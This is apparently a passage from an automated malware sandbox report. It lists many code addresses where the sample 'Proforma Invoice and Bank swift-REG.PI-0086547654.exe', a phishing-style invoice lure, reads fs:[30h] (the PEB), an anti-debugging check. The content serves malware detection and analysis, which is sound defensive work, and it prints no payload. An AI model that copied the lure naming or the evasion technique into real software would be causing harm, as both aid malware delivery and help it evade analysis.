Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA49A4 mov eax, dword ptr fs:[00000030h]	2_2_00BA49A4
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA49A4 mov eax, dword ptr fs:[00000030h]	2_2_00BA49A4
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA49A4 mov eax, dword ptr fs:[00000030h]	2_2_00BA49A4
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B12990 mov eax, dword ptr fs:[00000030h]	2_2_00B12990
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0C182 mov eax, dword ptr fs:[00000030h]	2_2_00B0C182
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1A185 mov eax, dword ptr fs:[00000030h]	2_2_00B1A185
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AEB1E1 mov eax, dword ptr fs:[00000030h]	2_2_00AEB1E1
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AEB1E1 mov eax, dword ptr fs:[00000030h]	2_2_00AEB1E1
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AEB1E1 mov eax, dword ptr fs:[00000030h]	2_2_00AEB1E1
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B741E8 mov eax, dword ptr fs:[00000030h]	2_2_00B741E8
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1513A mov eax, dword ptr fs:[00000030h]	2_2_00B1513A
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1513A mov eax, dword ptr fs:[00000030h]	2_2_00B1513A
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B04120 mov eax, dword ptr fs:[00000030h]	2_2_00B04120
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B04120 mov eax, dword ptr fs:[00000030h]	2_2_00B04120
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B04120 mov eax, dword ptr fs:[00000030h]	2_2_00B04120
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B04120 mov eax, dword ptr fs:[00000030h]	2_2_00B04120
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B04120 mov ecx, dword ptr fs:[00000030h]	2_2_00B04120
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE9100 mov eax, dword ptr fs:[00000030h]	2_2_00AE9100
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE9100 mov eax, dword ptr fs:[00000030h]	2_2_00AE9100
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE9100 mov eax, dword ptr fs:[00000030h]	2_2_00AE9100
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AEC962 mov eax, dword ptr fs:[00000030h]	2_2_00AEC962
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AEB171 mov eax, dword ptr fs:[00000030h]	2_2_00AEB171
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AEB171 mov eax, dword ptr fs:[00000030h]	2_2_00AEB171
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0B944 mov eax, dword ptr fs:[00000030h]	2_2_00B0B944
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0B944 mov eax, dword ptr fs:[00000030h]	2_2_00B0B944
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1FAB0 mov eax, dword ptr fs:[00000030h]	2_2_00B1FAB0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE52A5 mov eax, dword ptr fs:[00000030h]	2_2_00AE52A5
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE52A5 mov eax, dword ptr fs:[00000030h]	2_2_00AE52A5
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE52A5 mov eax, dword ptr fs:[00000030h]	2_2_00AE52A5
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE52A5 mov eax, dword ptr fs:[00000030h]	2_2_00AE52A5
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE52A5 mov eax, dword ptr fs:[00000030h]	2_2_00AE52A5
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AFAAB0 mov eax, dword ptr fs:[00000030h]	2_2_00AFAAB0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AFAAB0 mov eax, dword ptr fs:[00000030h]	2_2_00AFAAB0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1D294 mov eax, dword ptr fs:[00000030h]	2_2_00B1D294
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1D294 mov eax, dword ptr fs:[00000030h]	2_2_00B1D294
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B12AE4 mov eax, dword ptr fs:[00000030h]	2_2_00B12AE4
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]	2_2_00BA4AEF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]	2_2_00BA4AEF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]	2_2_00BA4AEF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]	2_2_00BA4AEF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]	2_2_00BA4AEF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]	2_2_00BA4AEF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]	2_2_00BA4AEF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]	2_2_00BA4AEF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]	2_2_00BA4AEF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]	2_2_00BA4AEF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]	2_2_00BA4AEF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]	2_2_00BA4AEF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]	2_2_00BA4AEF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]	2_2_00BA4AEF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B12ACB mov eax, dword ptr fs:[00000030h]	2_2_00B12ACB
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A229 mov eax, dword ptr fs:[00000030h]	2_2_00B0A229
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A229 mov eax, dword ptr fs:[00000030h]	2_2_00B0A229
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A229 mov eax, dword ptr fs:[00000030h]	2_2_00B0A229
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A229 mov eax, dword ptr fs:[00000030h]	2_2_00B0A229
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A229 mov eax, dword ptr fs:[00000030h]	2_2_00B0A229
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A229 mov eax, dword ptr fs:[00000030h]	2_2_00B0A229
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A229 mov eax, dword ptr fs:[00000030h]	2_2_00B0A229
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A229 mov eax, dword ptr fs:[00000030h]	2_2_00B0A229
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A229 mov eax, dword ptr fs:[00000030h]	2_2_00B0A229
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B24A2C mov eax, dword ptr fs:[00000030h]	2_2_00B24A2C
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B24A2C mov eax, dword ptr fs:[00000030h]	2_2_00B24A2C
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF8A0A mov eax, dword ptr fs:[00000030h]	2_2_00AF8A0A
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B03A1C mov eax, dword ptr fs:[00000030h]	2_2_00B03A1C
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BAAA16 mov eax, dword ptr fs:[00000030h]	2_2_00BAAA16
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BAAA16 mov eax, dword ptr fs:[00000030h]	2_2_00BAAA16
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AEAA16 mov eax, dword ptr fs:[00000030h]	2_2_00AEAA16
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AEAA16 mov eax, dword ptr fs:[00000030h]	2_2_00AEAA16
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE5210 mov eax, dword ptr fs:[00000030h]	2_2_00AE5210
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE5210 mov ecx, dword ptr fs:[00000030h]	2_2_00AE5210
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE5210 mov eax, dword ptr fs:[00000030h]	2_2_00AE5210
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE5210 mov eax, dword ptr fs:[00000030h]	2_2_00AE5210
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B2927A mov eax, dword ptr fs:[00000030h]	2_2_00B2927A
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B9B260 mov eax, dword ptr fs:[00000030h]	2_2_00B9B260
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B9B260 mov eax, dword ptr fs:[00000030h]	2_2_00B9B260
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB8A62 mov eax, dword ptr fs:[00000030h]	2_2_00BB8A62
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B74257 mov eax, dword ptr fs:[00000030h]	2_2_00B74257
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE9240 mov eax, dword ptr fs:[00000030h]	2_2_00AE9240
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE9240 mov eax, dword ptr fs:[00000030h]	2_2_00AE9240
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE9240 mov eax, dword ptr fs:[00000030h]	2_2_00AE9240
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE9240 mov eax, dword ptr fs:[00000030h]	2_2_00AE9240
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BAEA55 mov eax, dword ptr fs:[00000030h]	2_2_00BAEA55
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B14BAD mov eax, dword ptr fs:[00000030h]	2_2_00B14BAD
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B14BAD mov eax, dword ptr fs:[00000030h]	2_2_00B14BAD
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B14BAD mov eax, dword ptr fs:[00000030h]	2_2_00B14BAD
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB5BA5 mov eax, dword ptr fs:[00000030h]	2_2_00BB5BA5
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF1B8F mov eax, dword ptr fs:[00000030h]	2_2_00AF1B8F
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF1B8F mov eax, dword ptr fs:[00000030h]	2_2_00AF1B8F
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1B390 mov eax, dword ptr fs:[00000030h]	2_2_00B1B390
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B12397 mov eax, dword ptr fs:[00000030h]	2_2_00B12397
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA138A mov eax, dword ptr fs:[00000030h]	2_2_00BA138A
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B9D380 mov ecx, dword ptr fs:[00000030h]	2_2_00B9D380
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B103E2 mov eax, dword ptr fs:[00000030h]	2_2_00B103E2
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B103E2 mov eax, dword ptr fs:[00000030h]	2_2_00B103E2
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B103E2 mov eax, dword ptr fs:[00000030h]	2_2_00B103E2
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B103E2 mov eax, dword ptr fs:[00000030h]	2_2_00B103E2
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B103E2 mov eax, dword ptr fs:[00000030h]	2_2_00B103E2
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B103E2 mov eax, dword ptr fs:[00000030h]	2_2_00B103E2
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0DBE9 mov eax, dword ptr fs:[00000030h]	2_2_00B0DBE9
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B923E3 mov ecx, dword ptr fs:[00000030h]	2_2_00B923E3
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B923E3 mov ecx, dword ptr fs:[00000030h]	2_2_00B923E3
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B923E3 mov eax, dword ptr fs:[00000030h]	2_2_00B923E3
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B653CA mov eax, dword ptr fs:[00000030h]	2_2_00B653CA
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B653CA mov eax, dword ptr fs:[00000030h]	2_2_00B653CA
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA131B mov eax, dword ptr fs:[00000030h]	2_2_00BA131B
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]	2_2_00B0A309
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]	2_2_00B0A309
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]	2_2_00B0A309
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]	2_2_00B0A309
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]	2_2_00B0A309
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]	2_2_00B0A309
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]	2_2_00B0A309
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]	2_2_00B0A309
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]	2_2_00B0A309
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]	2_2_00B0A309
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]	2_2_00B0A309
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]	2_2_00B0A309
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]	2_2_00B0A309
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]	2_2_00B0A309
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]	2_2_00B0A309
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]	2_2_00B0A309
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]	2_2_00B0A309
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]	2_2_00B0A309
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]	2_2_00B0A309
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]	2_2_00B0A309
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]	2_2_00B0A309
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B13B7A mov eax, dword ptr fs:[00000030h]	2_2_00B13B7A
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B13B7A mov eax, dword ptr fs:[00000030h]	2_2_00B13B7A
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AEDB60 mov ecx, dword ptr fs:[00000030h]	2_2_00AEDB60
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB8B58 mov eax, dword ptr fs:[00000030h]	2_2_00BB8B58
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AEDB40 mov eax, dword ptr fs:[00000030h]	2_2_00AEDB40
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AEF358 mov eax, dword ptr fs:[00000030h]	2_2_00AEF358
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]	2_2_00BA4496
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]	2_2_00BA4496
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]	2_2_00BA4496
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]	2_2_00BA4496
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]	2_2_00BA4496
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]	2_2_00BA4496
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]	2_2_00BA4496
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]	2_2_00BA4496
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]	2_2_00BA4496
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]	2_2_00BA4496
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]	2_2_00BA4496
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]	2_2_00BA4496
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]	2_2_00BA4496
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF849B mov eax, dword ptr fs:[00000030h]	2_2_00AF849B
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA14FB mov eax, dword ptr fs:[00000030h]	2_2_00BA14FB
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B66CF0 mov eax, dword ptr fs:[00000030h]	2_2_00B66CF0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B66CF0 mov eax, dword ptr fs:[00000030h]	2_2_00B66CF0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B66CF0 mov eax, dword ptr fs:[00000030h]	2_2_00B66CF0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB8CD6 mov eax, dword ptr fs:[00000030h]	2_2_00BB8CD6
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1BC2C mov eax, dword ptr fs:[00000030h]	2_2_00B1BC2C
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB740D mov eax, dword ptr fs:[00000030h]	2_2_00BB740D
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB740D mov eax, dword ptr fs:[00000030h]	2_2_00BB740D
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB740D mov eax, dword ptr fs:[00000030h]	2_2_00BB740D
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00BA1C06
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00BA1C06
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00BA1C06
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00BA1C06
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00BA1C06
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00BA1C06
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00BA1C06
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00BA1C06
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00BA1C06
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00BA1C06
